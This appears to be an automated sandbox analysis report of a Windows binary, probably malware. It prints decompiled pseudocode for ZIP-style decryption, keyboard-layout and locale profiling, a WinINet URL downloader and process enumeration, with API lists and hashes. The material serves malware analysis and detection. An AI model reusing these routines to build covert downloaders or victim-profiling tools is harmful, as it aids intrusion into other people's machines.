											_t580 =  *_t579;
											 *_t607 = 0x12345678;
											__eflags = _t580;
											if(_t580 != 0) {
												while(1) {
													_t382 =  *_t580 & 0x000000ff;
													__eflags = _t382;
													if(_t382 == 0) {
														goto L45;
													}
													E00426920(_t607, _t382);
													_t618 = _t618 + 8;
													_t580 = _t580 + 1;
													__eflags = _t580;
													if(_t580 != 0) {
														continue;
													}
													goto L45;
												}
											}
											L45:
											__eflags =  *0x464990;
											if( *0x464990 == 0) {
												_t379 = GetDesktopWindow();
												__eflags = _t379 ^ GetTickCount();
												E0042E0CE(_t379 ^ GetTickCount());
												_t618 = _t618 + 4;
											}
											_t581 = 0;
											__eflags = 0;
											do {
												 *((char*)(_t616 + _t581 - 0x24)) = E0042E0E0(__eflags) >> 7;
												_t581 = _t581 + 1;
												__eflags = _t581 - 0xc;
											} while (__eflags < 0);
											_t325 = _t607[8];
											_t561 = 0;
											__eflags = 0;
											_v29 = _v1168 >> 8;
											_t482 =  *_t607;
											_v1188 = 0;
											_v1192 = _t607[4];
											do {
												_t484 =  *(0x446da8 + (( *(_t616 + _t561 - 0x24) ^ _t482) & 0x000000ff) * 4) ^ _t482 >> 0x00000008;
												_t588 = 1 + ((_t484 & 0x000000ff) + _v1192) * 0x8088405;
												 *_t607 = _t484;
												_t607[4] = _t588;
												_t327 = _t325 >> 0x00000008 ^  *(0x446da8 + ((_t588 >> 0x00000018 ^ _t325) & 0x000000ff) * 4);
												_t421 = _v1188;
												_t607[8] = _t327;
												 *(_t616 + _t421 - 0x24) = ((_t325 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t325 & 0x0000fffd | 0x00000002) >> 0x00000008 ^  *(_t616 + _t421 - 0x24);
												_t575 = _t421;
												_v1180 =  *(_t616 + _t575 - 0x23) & 0x000000ff;
												_v1188 = _t327 & 0x0000fffd | 0x00000002;
												_t430 =  *(0x446da8 + ((_v1180 ^ _t484) & 0x000000ff) * 4) ^ _t484 >> 0x00000008;
												_t489 = 1 + ((_t430 & 0x000000ff) + _t588) * 0x8088405;
												 *_t607 = _t430;
												_v1192 = _t430;
												_t607[4] = _t489;
												_t593 = _t327 >> 0x00000008 ^  *(0x446da8 + ((_t489 >> 0x00000018 ^ _t327) & 0x000000ff) * 4);
												 *(_t616 + _t575 - 0x23) = (_v1188 ^ 0x00000001) * _v1188 >> 0x00000008 ^ _v1180;
												_t436 =  *(_t616 + _t575 - 0x22);
												_v1180 = _t436;
												_v1188 = _t593 & 0x0000fffd | 0x00000002;
												_t334 = _v1192;
												_v1192 = _t334 >> 8;
												_t607[8] = _t593;
												_t337 =  *(0x446da8 + ((_t436 ^ _t334) & 0x000000ff) * 4) ^ _v1192;
												_v1192 = _t337;
												 *_t607 = _t337;
												_t341 = 1 + ((_t337 & 0x000000ff) + _t489) * 0x8088405;
												_t607[4] = _t341;
												_t595 = _t593 >> 0x00000008 ^  *(0x446da8 + ((_t341 >> 0x00000018 ^ _t593) & 0x000000ff) * 4);
												 *(_t616 + _t575 - 0x22) = (_v1188 ^ 0x00000001) * _v1188 >> 0x00000008 ^ _v1180;
												_t445 =  *((intOrPtr*)(_t616 + _t575 - 0x21));
												_v1180 = _t445;
												_v1188 = _t595 & 0x0000fffd | 0x00000002;
												_t498 = _v1192;
												_t607[8] = _t595;
												_v1192 = _t498 >> 8;
												_t482 =  *(0x446da8 + ((_t445 ^ _t498) & 0x000000ff) * 4) ^ _v1192;
												_t561 = _t575 + 4;
												_t344 = 1 + (_t341 + (_t482 & 0x000000ff)) * 0x8088405;
												_t607[4] = _t344;
												_v1192 = _t344;
												 *_t607 = _t482;
												_t325 = _t595 >> 0x00000008 ^  *(0x446da8 + ((_t344 >> 0x00000018 ^ _t595) & 0x000000ff) * 4);
												_t607[8] = _t325;
												 *(_t616 + _t561 - 0x25) = (_v1188 ^ 0x00000001) * _v1188 >> 0x00000008 ^ _v1180;
												_v1188 = _t561;
												__eflags = _t561 - 0xc;
											} while (_t561 < 0xc);
											_t608 = _v1204;
											_t455 = _v1181;
											_t579 = 0;
											__eflags =  *_t608;
											if( *_t608 == 0) {
												L57:
												_t348 = 0;
												__eflags = 0;
											} else {
												__eflags = _t455;
												if(_t455 == 0) {
													E00426EB0(_t608,  &_v40, 0xc);
													_t233 =  &(_t608[6]);
													 *_t233 = _t608[6] + 0xc;
													__eflags =  *_t233;
												}
												__eflags =  *_t608 - _t579;
												if( *_t608 == _t579) {
													goto L57;
												} else {
													__eflags = _t455;
													if(_t455 != 0) {
														goto L57;
													} else {
														_t348 = 1;
													}
												}
											}
											__eflags = _t455;
											_t456 = _v1200;
											_t608[0xb] = _t348;
											if(_t455 != 0) {
												_t608[0x24] = _t579;
											} else {
												__eflags = _t456 - 8;
												if(_t456 != 8) {
													__eflags = _t456;
													if(__eflags == 0) {
														_t579 = E00427540(_t608, __eflags);
													}
												} else {
													_t377 = E00428B50(_t608,  &_v1176); // executed
													_t579 = _t377;
												}
											}
											__eflags = _t608[0x20];
											_t608[0xb] = 0;
											if(_t608[0x20] != 0) {
												_t373 = _t608[0x1f];
												__eflags = _t373;
												if(_t373 != 0) {
													CloseHandle(_t373);
												}
											}
											_t538 = _t608[0x24];
											_t300 = _t608[5];
											_t501 = _t608[0x1d];
											_t608[6] = _t608[6] + _t538;
											_t608[0x1f] = 0;
											_t608[0x1c] = _t501;
											__eflags = _t608[5];
											if(_t608[5] != 0) {
												goto L92;
											} else {
												__eflags = _t579;
												if(_t579 != 0) {
													goto L39;
												} else {
													_t579 = _t608[0x1e];
													_t352 = _v1196 + _t538;
													__eflags = _v1160 - _t352;
													_v1164 = _t608[0x1e];
													_t538 = _t538 & 0xffffff00 | _v1160 == _t352;
													__eflags = _t608[7];
													_v1160 = _t352;
													_v1156 = _t501;
													if(_t608[7] == 0) {
														L78:
														__eflags = _v1170 - _t456;
														if(_v1170 != _t456) {
															L81:
															_pop(_t458);
															_pop(_t610);
															__eflags = _v8 ^ _t616;
															return E0042A36A(0x4000000, _t458, _v8 ^ _t616, _t538, _t579, _t610);
														} else {
															__eflags = _t456;
															if(_t456 != 0) {
																L82:
																_t356 = E00426200(_t501,  &_v1176, E00427E30, _t608);
																__eflags = _t356;
																if(_t356 != 0) {
																	goto L39;
																} else {
																	_t276 =  &(_t608[6]);
																	 *_t276 = _t608[6] + 0x10;
																	__eflags =  *_t276;
																	_v1172 = _v1132;
																	goto L84;
																}
															} else {
																__eflags = _t538;
																if(_t538 != 0) {
																	goto L82;
																} else {
																	goto L81;
																}
															}
														}
													} else {
														__eflags =  *_t608;
														if( *_t608 == 0) {
															L72:
															__eflags = _v1172 & 0x00000001;
															_v1170 = _t456;
															if((_v1172 & 0x00000001) == 0) {
																_t263 =  &_v1172;
																 *_t263 = _v1172 & 0x0000fff7;
																__eflags =  *_t263;
															}
															_t538 = _v1172;
															_v1132 = _v1172;
															_t368 = E00427010(_t608, _v1124 - _t608[4]);
															__eflags = _t368;
															if(_t368 == 0) {
																L77:
																_pop(_t461);
																_pop(_t613);
																__eflags = _v8 ^ _t616;
																return E0042A36A(0x2000000, _t461, _v8 ^ _t616, _t538, _t579, _t613);
															} else {
																_t371 = E00425FC0( &_v1176,  &_v1176, E00427E30, _t608);
																__eflags = _t371;
																if(_t371 != 0) {
																	goto L39;
																} else {
																	_t538 = _t608[6];
																	_t372 = E00427010(_t608, _t608[6]);
																	__eflags = _t372;
																	if(_t372 != 0) {
																		L84:
																		_t300 = _t608[5];
																		__eflags = _t608[5];
																		if(__eflags != 0) {
																			goto L92;
																		} else {
																			_t599 = E0042C541(_v1144, _t579, _t608, __eflags);
																			E0042B8D0(_t599, _v856, _v1144);
																			_v856 = _t599;
																			_t360 = E0042C541(_v1144, _t599, _t608, __eflags, 0x360, _v1144);
																			_t577 =  &_v1176;
																			_t600 = _t360;
																			E0042B8D0(_t600,  &_v1176, 0x360);
																			_t362 = _t608[0x11];
																			__eflags = _t362;
																			if(_t362 != 0) {
																				__eflags =  *(_t362 + 0x35c);
																				while( *(_t362 + 0x35c) != 0) {
																					_t362 =  *(_t362 + 0x35c);
																					__eflags =  *(_t362 + 0x35c);
																				}
																				_pop(_t459);
																				 *(_t362 + 0x35c) = _t600;
																				_pop(_t611);
																				__eflags = _v8 ^ _t616;
																				return E0042A36A(0, _t459, _v8 ^ _t616, _t577, _t600, _t611);
																			} else {
																				_pop(_t460);
																				_t608[0x11] = _t600;
																				_pop(_t612);
																				__eflags = _v8 ^ _t616;
																				return E0042A36A(_t362, _t460, _v8 ^ _t616,  &_v1176, _t600, _t612);
																			}
																		}
																	} else {
																		goto L77;
																	}
																}
															}
														} else {
															__eflags = _v1181;
															if(_v1181 == 0) {
																goto L78;
															} else {
																goto L72;
															}
														}
													}
												}
											}
										} else {
											E004274E0(_t579);
											_pop(_t462);
											_pop(_t614);
											__eflags = _v8 ^ _t616;
											return E0042A36A( *(_t579 + 0x14), _t462, _v8 ^ _t616, _t560, _t579, _t614);
										}
									} else {
										E004274E0(_t579);
										L39:
										_pop(_t457);
										_pop(_t609);
										__eflags = _v8 ^ _t616;
										return E0042A36A(0x400, _t457, _v8 ^ _t616, _t538, _t579, _t609);
									}
								}
							}
						} else {
							_pop(_t615);
							__eflags = _v8 ^ _t616;
							return E0042A36A(0x10000, _t403, _v8 ^ _t616,  &_v312, _t579, _t615);
						}
					} else {
						__eflags = _v8 ^ _t616;
						return E0042A36A(0x50000, __ebx, _v8 ^ _t616, __edx, __ecx, __esi);
					}
				} else {
					return E0042A36A(0x40000, __ebx, _v8 ^ _t616, __edx, __ecx, __esi);
				}
			}

0x00428c70
0x00428c79
0x00428c80
0x00428c83
0x00428c87
0x00428c90
0x00428c96
0x00428c9c
0x00428cb4
0x00428cb8
0x00428cd0
0x00428cd3
0x00428cd4
0x00428cd7
0x00428ce1
0x00428ce3
0x00428ce6
0x00428ce8
0x00428ce8
0x00428ce6
0x00428cf3
0x00428cfa
0x00428d00
0x00428d07
0x00428d20
0x00428d26
0x00428d26
0x00428d29
0x00428d2b
0x00428d2b
0x00428d2e
0x00428d2f
0x00428d2f
0x00428d34
0x00428d37
0x00428d3a
0x00428d40
0x00428d42
0x00428d67
0x00428d67
0x00428d44
0x00428d4b
0x00428d50
0x00428d56
0x00428d59
0x00428d5e
0x00428d65
0x00000000
0x00000000
0x00428d65
0x00428d6e
0x00428d75
0x00428d76
0x00428d7b
0x00428d81
0x00428d96
0x00428d96
0x00428d96
0x00428d98
0x00428d83
0x00428d83
0x00428d8a
0x00428d8f
0x00428d92
0x00428d94
0x00000000
0x00000000
0x00428d94
0x00428d9e
0x00428da1
0x00428db3
0x00428db6
0x00428dcc
0x00428dcf
0x00428de5
0x00428de8
0x004295aa
0x00000000
0x00428dee
0x00428df0
0x00000000
0x00428df0
0x00428dd1
0x00428dde
0x00000000
0x00428dde
0x00428db8
0x00428dbb
0x00428dc5
0x00000000
0x00428dc5
0x00428da3
0x00428dac
0x00428df5
0x00428df7
0x00428df9
0x004295af
0x004295b2
0x004295b3
0x004295b4
0x004295bf
0x00428dff
0x00428e0b
0x00428e11
0x00428e25
0x00428e32
0x00428e38
0x00428e3f
0x00428e45
0x00428e53
0x00428e59
0x00428e59
0x00428e59
0x00428e59
0x00428e6b
0x00428e73
0x00428e7d
0x00428e82
0x00428e88
0x00428e8e
0x00428e98
0x00428e9e
0x00428ea8
0x00428eae
0x00428eb4
0x00428ebb
0x00428ebd
0x00428ebf
0x00428ec6
0x00428ec8
0x00428ecd
0x00428ecd
0x00428ec6
0x00428ed4
0x00428edb
0x00428ee2
0x00428ee4
0x00428efb
0x00428efb
0x00428ee6
0x00428ee6
0x00428ee9
0x00428eeb
0x00000000
0x00428eed
0x00428ef3
0x00428ef3
0x00428eeb
0x00428f07
0x00428f15
0x00428f1e
0x00428f25
0x00428f2b
0x00428f31
0x00428f37
0x00428f3f
0x00428f45
0x00428f51
0x00428f6a
0x00428f6d
0x00428f70
0x00428f73
0x00428f76
0x00428f84
0x00428f9d
0x00428fa0
0x00428fa3
0x00428fa6
0x00428fa9
0x00428fb4
0x00428fce
0x00428fd6
0x00428fe0
0x00428fea
0x00428ff1
0x00428ff8
0x00428ffb
0x00429013
0x00429017
0x0042901c
0x0042901f
0x00429021
0x0042904e
0x00429052
0x00429055
0x00429058
0x00429077
0x0042907a
0x00429081
0x00429088
0x0042908a
0x00429090
0x00429092
0x00429094
0x00429094
0x00429097
0x00429099
0x00000000
0x00000000
0x0042909d
0x004290a2
0x004290a5
0x004290a5
0x004290a6
0x00000000
0x00000000
0x00000000
0x004290a6
0x00429094
0x004290a8
0x004290a8
0x004290af
0x004290b1
0x004290bf
0x004290c2
0x004290c7
0x004290c7
0x004290ca
0x004290ca
0x004290d0
0x004290d8
0x004290dc
0x004290dd
0x004290dd
0x004290eb
0x004290f1
0x004290f1
0x004290f3
0x004290f6
0x004290f8
0x004290fe
0x00429104
0x0042911f
0x0042913b
0x00429146
0x00429148
0x00429151
0x00429160
0x0042916d
0x00429170
0x00429174
0x0042917b
0x0042918c
0x004291ab
0x004291b8
0x004291b9
0x004291c5
0x004291d1
0x004291db
0x004291f6
0x004291fa
0x00429206
0x0042920c
0x00429212
0x00429226
0x0042922c
0x00429236
0x0042923c
0x00429242
0x0042924f
0x00429257
0x00429263
0x00429283
0x00429287
0x0042928b
0x0042929d
0x004292a3
0x004292b4
0x004292b7
0x004292c4
0x004292ca
0x004292d8
0x004292d9
0x004292dc
0x004292ef
0x004292f8
0x00429311
0x00429314
0x00429318
0x0042931e
0x0042931e
0x00429327
0x0042932d
0x00429333
0x00429335
0x00429337
0x0042935d
0x0042935d
0x0042935d
0x00429339
0x00429339
0x0042933b
0x00429345
0x0042934a
0x0042934a
0x0042934a
0x0042934a
0x0042934e
0x00429350
0x00000000
0x00429352
0x00429352
0x00429354
0x00000000
0x00429356
0x00429356
0x00429356
0x00429354
0x00429350
0x0042935f
0x00429361
0x00429367
0x0042936a
0x00429392
0x0042936c
0x0042936c
0x0042936f
0x00429383
0x00429385
0x0042938e
0x0042938e
0x00429371
0x0042937a
0x0042937f
0x0042937f
0x0042936f
0x00429398
0x0042939f
0x004293a3
0x004293a5
0x004293a8
0x004293aa
0x004293ad
0x004293ad
0x004293aa
0x004293b3
0x004293b9
0x004293bc
0x004293bf
0x004293c2
0x004293c9
0x004293cc
0x004293ce
0x00000000
0x004293d4
0x004293d4
0x004293d6
0x00000000
0x004293dc
0x004293e2
0x004293e5
0x004293e7
0x004293ed
0x004293f3
0x004293f6
0x004293fa
0x00429400
0x00429406
0x004294a1
0x004294a1
0x004294a8
0x004294b2
0x004294b2
0x004294b3
0x004294bd
0x004294c7
0x004294aa
0x004294aa
0x004294ac
0x004294ca
0x004294d7
0x004294df
0x004294e1
0x00000000
0x004294e7
0x004294ee
0x004294ee
0x004294ee
0x004294f2
0x00000000
0x004294f2
0x004294ae
0x004294ae
0x004294b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004294b0
0x004294ac
0x0042940c
0x0042940c
0x0042940f
0x0042941e
0x0042941e
0x00429425
0x0042942c
0x00429433
0x00429433
0x00429433
0x00429433
0x00429443
0x0042944d
0x00429454
0x00429459
0x0042945b
0x00429489
0x00429489
0x0042948a
0x00429494
0x0042949e
0x0042945d
0x0042946a
0x00429472
0x00429474
0x00000000
0x0042947a
0x0042947a
0x00429480
0x00429485
0x00429487
0x004294f9
0x004294f9
0x004294fc
0x004294fe
0x00000000
0x00429504
0x00429516
0x00429521
0x0042952b
0x00429531
0x0042953b
0x00429541
0x00429545
0x0042954a
0x00429550
0x00429552
0x0042956a
0x00429571
0x00429580
0x00429586
0x00429586
0x0042958f
0x00429590
0x00429596
0x0042959d
0x004295a7
0x00429554
0x00429554
0x00429555
0x00429558
0x0042955d
0x00429567
0x00429567
0x00429552
0x00000000
0x00000000
0x00000000
0x00429487
0x00429474
0x00429411
0x00429411
0x00429418
0x00000000
0x00000000
0x00000000
0x00000000
0x00429418
0x0042940f
0x00429406
0x004293d6
0x0042905a
0x0042905c
0x00429064
0x00429065
0x0042906a
0x00429074
0x00429074
0x00429023
0x00429025
0x0042902a
0x0042902a
0x0042902b
0x00429035
0x0042903f
0x0042903f
0x00429021
0x00428df9
0x00428d09
0x00428d09
0x00428d13
0x00428d1d
0x00428d1d
0x00428cba
0x00428cc3
0x00428ccd
0x00428ccd
0x00428c9e
0x00428cb1
0x00428cb1

Strings

UT, xrefs: 00428FEA

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: UT
API String ID: 0-894488996
Opcode ID: 8ccf0144a0d926271bf02f5adcbad200dd5d104d518afafc52c5bb7610cc5d68
Instruction ID: f4098db56796c4fa5cb6c2a5cc478576ca445cbd8dbc532c660ca673540d1909
Opcode Fuzzy Hash: 8ccf0144a0d926271bf02f5adcbad200dd5d104d518afafc52c5bb7610cc5d68
Instruction Fuzzy Hash: F542F6B1B002698FDB24CF28D8807AEB7F5EF99304F5440AED94997341DB789E84CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041EE70() {
				signed int _v8;
				char _v520;
				CHAR* _v524;
				int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t19;
				int _t23;
				void* _t34;
				int _t40;
				int _t41;
				signed int _t42;
				signed int _t43;
				void* _t44;
				void* _t45;

				_t16 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t16 ^ _t43;
				_t19 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_t40 = 0;
				_v524 = _t19;
				_t41 = GetKeyboardLayoutList(0, 0);
				_t34 = LocalAlloc(0x40, _t41 * 4);
				_t23 = GetKeyboardLayoutList(_t41, _t34);
				_t42 = 0;
				_v528 = _t23;
				if(_t23 != 0) {
					do {
						_t39 =  *(_t34 + _t42 * 4) & 0x0000ffff;
						GetLocaleInfoA( *(_t34 + _t42 * 4) & 0x0000ffff, 2,  &_v520, 0x200); // executed
						if(_t40 == 0) {
							_t39 = _v524;
							wsprintfA(_v524, "%s",  &_v520);
							_t45 = _t44 + 0xc;
						} else {
							wsprintfA(_v524, "%s / %s", _v524,  &_v520);
							_t45 = _t44 + 0x10;
						}
						_t40 = _t40 + 1;
						E0042A2F0( &_v520, 0, 0x200);
						_t42 = _t42 + 1;
						_t44 = _t45 + 0xc;
					} while (_t42 < _v528);
				}
				if(_t34 != 0) {
					LocalFree(_t34);
				}
				return E0042A36A(_v524, _t34, _v8 ^ _t43, _t39, _t40, _t42);
			}

0x0041ee79
0x0041ee80
0x0041ee94
0x0041ee9a
0x0041ee9e
0x0041eeaa
0x0041eebc
0x0041eec0
0x0041eec6
0x0041eec8
0x0041eed0
0x0041eee0
0x0041eee0
0x0041eef3
0x0041eefb
0x0041ef1c
0x0041ef2f
0x0041ef35
0x0041eefd
0x0041ef11
0x0041ef17
0x0041ef17
0x0041ef46
0x0041ef47
0x0041ef4c
0x0041ef4d
0x0041ef50
0x0041eee0
0x0041ef5a
0x0041ef5d
0x0041ef5d
0x0041ef79

APIs

GetProcessHeap.KERNEL32(00000000,000001F4,?,00000010,?), ref: 0041EE8D
HeapAlloc.KERNEL32(00000000,?,00000010,?), ref: 0041EE94
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000010,?), ref: 0041EEA4
LocalAlloc.KERNEL32(00000040,00000000,?,00000010,?), ref: 0041EEB6
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000010,?), ref: 0041EEC0
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000010,?), ref: 0041EEF3
wsprintfA.USER32 ref: 0041EF11
wsprintfA.USER32 ref: 0041EF2F
_memset.LIBCMT ref: 0041EF47
LocalFree.KERNEL32(00000000,?,00000010,?), ref: 0041EF5D

Strings

%s / %s, xrefs: 0041EF0B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
String ID: %s / %s
API String ID: 2849719339-2910687431
Opcode ID: 8666b519bc5fb2270eeacebb8bbb48e862458625be0480ff6730e4d03aeff2a0
Instruction ID: 9853aba74be183f43dfa3eb12b07bc05057ce398c4e793d794570e01742257f7
Opcode Fuzzy Hash: 8666b519bc5fb2270eeacebb8bbb48e862458625be0480ff6730e4d03aeff2a0
Instruction Fuzzy Hash: 6721F975600318ABEB10AFA1DC8DFAB77BCEB85701F0041A5FD1593141EAB45D81CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00414330 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00414330(void* __eflags, char* _a4, char* _a8, intOrPtr _a28) {
				long _v8;
				char _v16;
				signed int _v20;
				void _v1044;
				long _v1048;
				long _v1052;
				void _v1056;
				void* _v1060;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t33;
				void* _t35;
				void* _t38;
				char* _t39;
				void* _t43;
				long _t53;
				void* _t56;
				void* _t57;
				char* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void* _t80;

				_push(0xffffffff);
				_push(E0043EBF8);
				_push( *[fs:0x0]);
				_t32 =  *0x451f00; // 0xc21d6f0a
				_t33 = _t32 ^ _t77;
				_v20 = _t33;
				_push(_t33);
				 *[fs:0x0] =  &_v16;
				_t69 = _a4;
				_push("https");
				_v8 = 0;
				_v1052 = 1;
				_v1048 = 0;
				_t35 = E004140E0(1, _t69, _t69);
				_t80 = _t78 - 0x414 + 4;
				_push(_t35);
				if( *0x464890() == 0) {
					_v1048 = 1;
				}
				_t38 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
				_t56 = _t38;
				_t39 = _a8;
				if(_a28 < 0x10) {
					_t39 =  &_a8;
				}
				_t74 = InternetOpenA(_t39, 0, 0, 0, 0);
				_v1060 = _t74;
				_v1056 = 0x927c0;
				InternetSetOptionA(_t74, 2,  &_v1056, 4);
				_push(0);
				if(_v1048 == 0) {
					_push(0x4000100);
				} else {
					_push(0x4800100);
				}
				_t43 = InternetOpenUrlA(_t74, _t69, 0, 0, ??, ??);
				_t70 = 0;
				_v1048 = _t43;
				if(_v1052 > 0) {
					while(1) {
						InternetReadFile(_v1048,  &_v1044, 0x400,  &_v1052); // executed
						_t76 = 0;
						if(_v1052 <= 0) {
							break;
						} else {
							goto L9;
						}
						do {
							L9:
							E0042B8D0(_t70 + _t56, _t77 + _t76 - 0x410, 1);
							_t53 = _v1052;
							_t76 = _t76 + 1;
							_t80 = _t80 + 0xc;
							_t70 = _t70 + 1;
						} while (_t76 < _t53);
						if(_t53 != 0) {
							continue;
						}
						break;
					}
					_t74 = _v1060;
				}
				InternetCloseHandle(_v1048);
				InternetCloseHandle(_t74);
				if(_a28 >= 0x10) {
					_push(_a8);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t71);
				_pop(_t75);
				_pop(_t57);
				return E0042A36A(_t56, _t57, _v20 ^ _t77, _t70, _t71, _t75);
			}

0x00414333
0x00414335
0x00414340
0x00414347
0x0041434c
0x0041434e
0x00414354
0x00414358
0x0041435e
0x00414363
0x0041436e
0x00414371
0x00414377
0x0041437d
0x00414382
0x00414385
0x0041438e
0x00414390
0x00414390
0x004143a3
0x004143ad
0x004143af
0x004143b2
0x004143b4
0x004143b4
0x004143c2
0x004143d0
0x004143d6
0x004143e0
0x004143ed
0x004143ef
0x004143f8
0x004143f1
0x004143f1
0x004143f1
0x00414403
0x00414409
0x0041440b
0x00414417
0x00414419
0x00414433
0x00414439
0x00414441
0x00000000
0x00000000
0x00000000
0x00000000
0x00414443
0x00414443
0x00414451
0x00414456
0x0041445c
0x0041445d
0x00414460
0x00414461
0x00414467
0x00000000
0x00000000
0x00000000
0x00414467
0x00414469
0x00414469
0x00414476
0x0041447d
0x00414487
0x0041448c
0x0041448d
0x00414492
0x0041449c
0x004144a4
0x004144a5
0x004144a6
0x004144b4

APIs

Part of subcall function 004140E0: _memset.LIBCMT ref: 004140FF
Part of subcall function 004140E0: _memset.LIBCMT ref: 0041410C
Part of subcall function 004140E0: lstrlen.KERNEL32(00000000,10000000,?,?,?,?,?,?,00000000), ref: 00414132
Part of subcall function 004140E0: InternetCrackUrlA.WININET(00000000,00000000), ref: 0041413A

StrCmpCA.SHLWAPI(00000000,00000000), ref: 00414386
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0041439C
RtlAllocateHeap.NTDLL(00000000), ref: 004143A3
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004143BC
InternetSetOptionA.WININET(00000000,00000002), ref: 004143E0
InternetOpenUrlA.WININET(00000000,00443C1C,00000000,00000000,04000100,00000000), ref: 00414403
InternetReadFile.WININET(00000000,?,00000400,00000004), ref: 00414433
InternetCloseHandle.WININET(00000000), ref: 00414476
InternetCloseHandle.WININET(00000000), ref: 0041447D

Strings

https, xrefs: 00414363

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen_memset$AllocateCrackFileOptionProcessReadlstrlen
String ID: https
API String ID: 2133551499-1056335270
Opcode ID: 35a71db96f68160520d019468c2c50c99fc72291a8cb0a2da562278ab8f314e9
Instruction ID: f04f8274ab8081bd5a8bc1aa0246e4458f370152715da1e826fd0132e278c53f
Opcode Fuzzy Hash: 35a71db96f68160520d019468c2c50c99fc72291a8cb0a2da562278ab8f314e9
Instruction Fuzzy Hash: 044187B1A00228ABDB10DF55DC49BDAB7B8FB89704F40417AF619A7240D7B45AC0CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041F040 Relevance: 15.1, APIs: 10, Instructions: 91
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E0041F040(intOrPtr _a4) {
				int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				int _v32;
				char _v48;
				char _v308;
				intOrPtr _v336;
				void* _v344;
				void* _v345;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t26;
				int _t28;
				int _t29;
				int _t31;
				intOrPtr* _t36;
				void* _t44;
				void* _t54;
				void* _t55;
				intOrPtr _t57;
				void* _t58;
				signed int _t59;
				void* _t60;
				void* _t61;

				_push(0xffffffff);
				_push(E0043F428);
				_push( *[fs:0x0]);
				_t61 = _t60 - 0x14c;
				_t23 =  *0x451f00; // 0xc21d6f0a
				_t24 = _t23 ^ _t59;
				_v20 = _t24;
				_push(_t24);
				 *[fs:0x0] =  &_v16;
				_t57 = _a4;
				_v344 = 0x128;
				_t26 = CreateToolhelp32Snapshot(2, 0); // executed
				_t54 = _t26;
				_t28 = Process32First(_t54,  &_v344); // executed
				if(_t28 != 0) {
					_t31 = Process32Next(_t54,  &_v344); // executed
					_t63 = _t31;
					if(_t31 != 0) {
						do {
							 *0x464860(_t57, 0x4467b0);
							_t52 =  &_v308;
							 *0x464860(_t57,  &_v308);
							 *0x464860(_t57, " [");
							_t36 = E00423BF0(_t54, _t63,  &_v48, _v336);
							_v8 = 0;
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							 *0x464860(_t57, _t36);
							_v8 = 0xffffffff;
							if(_v28 >= 0x10) {
								_t52 = _v48;
								_push(_v48);
								E0042A289();
								_t61 = _t61 + 4;
							}
							_v28 = 0xf;
							_v32 = 0;
							_v48 = 0;
							 *0x464860(_t57, "]\n");
						} while (Process32Next(_t54,  &_v344) != 0);
					}
				}
				_t29 = CloseHandle(_t54);
				 *[fs:0x0] = _v16;
				_pop(_t55);
				_pop(_t58);
				_pop(_t44);
				return E0042A36A(_t29, _t44, _v20 ^ _t59, _t52, _t55, _t58);
			}

0x0041f043
0x0041f045
0x0041f050
0x0041f051
0x0041f057
0x0041f05c
0x0041f05e
0x0041f064
0x0041f068
0x0041f06e
0x0041f076
0x0041f080
0x0041f086
0x0041f090
0x0041f098
0x0041f0a6
0x0041f0ac
0x0041f0ae
0x0041f0b4
0x0041f0ba
0x0041f0c0
0x0041f0c8
0x0041f0d4
0x0041f0eb
0x0041f0f4
0x0041f0f7
0x0041f0f9
0x0041f0f9
0x0041f0fd
0x0041f107
0x0041f10e
0x0041f110
0x0041f113
0x0041f114
0x0041f119
0x0041f119
0x0041f122
0x0041f129
0x0041f12c
0x0041f12f
0x0041f143
0x0041f0b4
0x0041f0ae
0x0041f14c
0x0041f155
0x0041f15d
0x0041f15e
0x0041f15f
0x0041f16d

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041F080
Process32First.KERNEL32(00000000,00000128), ref: 0041F090
Process32Next.KERNEL32 ref: 0041F0A6
